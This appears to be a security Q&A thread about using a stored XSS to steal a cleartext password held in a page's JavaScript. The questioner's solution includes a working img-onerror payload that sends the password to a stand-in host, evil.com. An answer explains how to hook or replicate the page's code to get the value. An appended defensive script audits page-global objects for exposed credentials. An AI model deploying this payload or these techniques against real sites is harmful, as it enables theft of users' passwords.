If I put a breakpoint on a JavaScript function when I visit a web page and examine a JS variable, that variable contains the cleartext password just for a brief period of time.
I found an XSS and I want to access the content of that variable. I'm trying the following:
    var i;
    for (i = 1; i < 10000; i++) {
        if (typeof cleartext_password !== 'undefined') {
            cleartext_password;
        }
    }
Anyway, it seems the loop doesn't iterate; I just see 4 "undefined reference" errors in the console.
What am I missing?
SOLUTION
I opted for the clean solution as suggested by CBHacking in his answer. The password was stored in clear within the DOM. I was able to leverage a stored XSS to exfiltrate the password as follows:
<img src=x onerror="this.onerror=null;this.src='http://evil.com?mmmh='+window.vuln_name.clear_textpassword">
The obvious answers: if cleartext_password isn't in scope for your little loop then it will never have any value to read; your breakpointed function's local variables are probably not accessible from your XSS payload.

The ugly-hack solution: write your own version of the relevant JS function (the one you're breakpointing) with extra code that dumps the password to somewhere persistent, and/or remove the delete call (if there is one) that erases the variable. Replace the legit function with your modified version (this might require additionally replacing functions that create / define the breakpointed code, depending on how that function is defined and whether it's stored in a visible variable).

The actually good solution: read the function you're breakpointing to see where the cleartext_password variable gets set, and where the function gets its value from (obvious candidates are the DOM, local storage, or an XHR/fetch call to the server). Just execute the same operation (DOM lookup, local storage read, XHR/fetch request, etc.) to retrieve the value directly.
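The scoping distinction the answer draws, seen from the page owner's side, as an added example that is not part of the original question or answer: a secret parked on a page-global object is reachable by plain property access from any script in the origin, while a closure variable is not enumerable at all. The names `vuln_name` and `clear_textpassword` come from the post; the plain objects standing in for `window`, the helper names and the password values are constructed assumptions.

```javascript
// Added example. `vuln_name` and `clear_textpassword` are the names from the
// post; the password values and all helper names here are constructed.

// Exposed pattern: the secret is a property of an object hanging off the
// page's global scope, so every script in the origin can read it by path.
function buildExposedPage(scope, secret) {
  scope.vuln_name = { user: 'alice', clear_textpassword: secret };
}

// Contained pattern: the secret is only a closure variable. The global
// surface offers an action, not the value, and the reference is dropped
// after use.
function buildContainedPage(scope, secret, transport) {
  let held = secret;
  scope.login = {
    submit() {
      const ok = transport(held);
      held = null;
      return ok;
    },
  };
}

// Audit: list every credential-looking string reachable from `root` by plain
// property access, which is all that a script sharing the scope needs.
function findReachableSecrets(root, maxDepth = 5) {
  const keyPattern = /pass(word|wd)?|secret|token/i;
  const seen = new Set(); // guards against cyclic object graphs
  const hits = [];
  (function walk(node, path, depth) {
    if (node === null || typeof node !== 'object' || seen.has(node)) return;
    if (depth > maxDepth) return;
    seen.add(node);
    for (const key of Object.getOwnPropertyNames(node)) {
      let value;
      try { value = node[key]; } catch (e) { continue; } // throwing getters
      const here = path ? `${path}.${key}` : key;
      if (typeof value === 'string' && value && keyPattern.test(key)) hits.push(here);
      else walk(value, here, depth + 1);
    }
  })(root, '', 0);
  return hits;
}

// Constructed stand-ins for two pages' global scopes (no browser needed).
const exposed = {};
buildExposedPage(exposed, 'constructed-pw-1');
const contained = {};
buildContainedPage(contained, 'constructed-pw-2', (pw) => pw.length > 0);
console.log(findReachableSecrets(exposed), findReachableSecrets(contained));
```

Run against a real page's state object in a test build, the same audit gives a list of fields to move out of global scope or to stop sending to the client in cleartext.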